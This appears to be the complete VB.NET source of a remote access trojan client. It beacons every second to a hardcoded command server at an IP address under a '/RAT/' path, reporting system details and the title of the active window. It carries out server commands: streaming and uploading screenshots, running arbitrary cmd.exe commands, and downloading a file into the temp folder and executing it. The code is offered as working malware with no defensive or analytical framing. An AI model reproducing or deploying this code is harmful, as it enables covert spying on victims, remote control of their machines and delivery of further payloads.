Imports System.TextImports System.NetImports System.ThreadingImports Syste

1. Imports System.Text
2. Imports System.Net
3. Imports System.Threading
4. Imports System.Net.NetworkInformation
5. Imports System.IO
6. Imports System.Drawing.Imaging
7.  
8. ''' <summary>
9. ''' TODO: Ajouter un mutex
10. ''' </summary>
11.  
12. Public Class MainForm
13. Private Declare Function GetForegroundWindow Lib "user32" Alias "GetForegroundWindow" () As IntPtr
14. Private Declare Auto Function GetWindowText Lib "user32" (ByVal hWnd As System.IntPtr, ByVal lpString As System.Text.StringBuilder, ByVal cch As Integer) As Integer
15.  
16. Private Function GetCaption() As String
17. Dim Caption As New StringBuilder(256)
18. Dim hWnd As IntPtr = GetForegroundWindow()
19. GetWindowText(hWnd, Caption, Caption.Capacity)
20. Return Caption.ToString()
21. End Function
22.  
23. Dim EOFArguments As String() = {"http://185.62.188.189/RAT/"}
24. Dim mainWebClient As WebClient = New WebClient()
25.  
26. Dim screenshareQuality As Long = 25L
27. Dim screenshareFluxInterval As Integer = 500
28.  
29. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
30. ' FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read)
31. ' Dim Data As String = Space(LOF(1))
32. 'FileGet(1, Data)
33. 'FileClose(1)
34.  
35. Dim upTime As Integer = 0
36. Dim cpuCounter As PerformanceCounter = New PerformanceCounter("Processor", "% Processor Time", "_Total")
37. Dim softwareName As String = AppDomain.CurrentDomain.FriendlyName
38.  
39.  
40. ' Try
41. While True
42. Dim address As IPAddress = Dns.GetHostAddresses(New Uri(EOFArguments(0) & "clients.php?action=writeme").Host)(0)
43. Dim ping As String = New Ping().Send(address).RoundtripTime.ToString()
44.  
45. Dim apiResponse As String = New WebClient().DownloadString(EOFArguments(0) &
46. "clients.php?action=writeme&ping=" & ping &
47. "&ram=" & Math.Round(My.Computer.Info.AvailableVirtualMemory / (1024 * 1024), 2).ToString &
48. "&cpu=" & String.Format("{0:f0}", Convert.ToSingle(cpuCounter.NextValue())) &
49. "&currentwindow=" & GetCaption() &
50. "&uptime=" & upTime &
51. "&softwarename=" & softwareName
52. )
53.  
54. If apiResponse.Trim <> "" Then
55. Dim parsedResponse As String() = apiResponse.Split("|")
56. Dim actionType As String = parsedResponse(0)
57. Dim actionContent As String() = parsedResponse.Skip(1).ToArray
58.  
59. parseAction(actionType, actionContent)
60. End If
61.  
62. GC.Collect()
63. upTime += 1
64. Thread.Sleep(1000)
65. End While
66. 'Catch
67. 'End Try
68. End Sub
69.  
70. Private Sub parseAction(actionType As String, actionContent As String())
71.  
72. If actionType = "screenshare" Then
73. If actionContent(0) = "start" Then
74. screenshareQuality = actionContent(1)
75. screenshareFluxInterval = Convert.ToInt32(actionContent(2))
76.  
77. If Not screenshareBW.IsBusy Then
78. screenshareBW.RunWorkerAsync()
79. End If
80.  
81. Else
82. screenshareBW.CancelAsync()
83. End If
84.  
85. ElseIf actionType = "screenshot" Then
86. Dim screenGrab As Bitmap = TakeBitmapScreenshot()
87. Dim bmpBytes As Byte() = resizeConvertBMP(screenGrab, 75L)
88. mainWebClient.UploadData(EOFArguments(0) & "clients.php?action=uploadscreenshot&actioncontent=" + actionContent(0), bmpBytes)
89.  
90. ElseIf actionType = "runwincmd" Then
91. Shell("cmd.exe /c " & actionContent(0))
92.  
93. ElseIf actionType = "shutdownrat" Then
94. Environment.Exit(1)
95. End If
96.  
97. #Region "tools"
98. If actionType = "remotexec" Then
99. Dim filename As String = actionContent(0)
100. Dim client As New WebClient
101. client.DownloadFile(EOFArguments(0) & "/files/" & filename, filename)
102. File.Move(filename, System.IO.Path.GetTempPath & filename)
103. File.Delete(filename)
104. Process.Start(System.IO.Path.GetTempPath & filename)
105. End If
106. #End Region
107.  
108.  
109. End Sub
110.  
111. #Region "Screenshare"
112. Private Function GetEncoderInfo(ByVal mimeType As String) As ImageCodecInfo
113. Dim j As Integer
114. Dim encoders As ImageCodecInfo()
115. encoders = ImageCodecInfo.GetImageEncoders()
116. For j = 0 To encoders.Length - 1
117. If encoders(j).MimeType = mimeType Then Return encoders(j)
118. Next
119. Return Nothing
120. End Function
121. Private Function TakeBitmapScreenshot() As Bitmap
122. Dim screenSize As Size = New Size(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
123. Dim screenGrab As New Bitmap(My.Computer.Screen.Bounds.Width, My.Computer.Screen.Bounds.Height)
124. Dim g As Graphics = Graphics.FromImage(screenGrab)
125. g.CopyFromScreen(New Point(0, 0), New Point(0, 0), screenSize)
126. Return screenGrab
127. End Function
128. Private Function ResizeConvertBMP(bitmapData As Bitmap, imgQuality As Long) As Byte()
129. Dim myEncoderParameters = New EncoderParameters(1)
130. myEncoderParameters.Param(0) = New EncoderParameter(Imaging.Encoder.Quality, imgQuality)
131. Dim MS As MemoryStream = New MemoryStream()
132. Dim resizedBmp = New Bitmap(bitmapData, New Size(1600, 1050))
133. resizedBmp.Save(MS, GetEncoderInfo("image/jpeg"), myEncoderParameters)
134. Dim bmpBytes As Byte() = MS.GetBuffer()
135. bitmapData.Dispose()
136. MS.Close()
137.  
138. Return bmpBytes
139. End Function
140.  
141. Private Sub screenshareBW_DoWork(sender As Object, e As System.ComponentModel.DoWorkEventArgs) Handles screenshareBW.DoWork
142. While True
143. Dim screenGrab = TakeBitmapScreenshot()
144. Dim bmpBytes As Byte() = ResizeConvertBMP(screenGrab, screenshareQuality)
145. mainWebClient.UploadData(EOFArguments(0) & "clients.php?action=uploadimage", bmpBytes)
146. Thread.Sleep(screenshareFluxInterval)
147. End While
148. End Sub
149.  
150. #End Region
151.  
152. End Class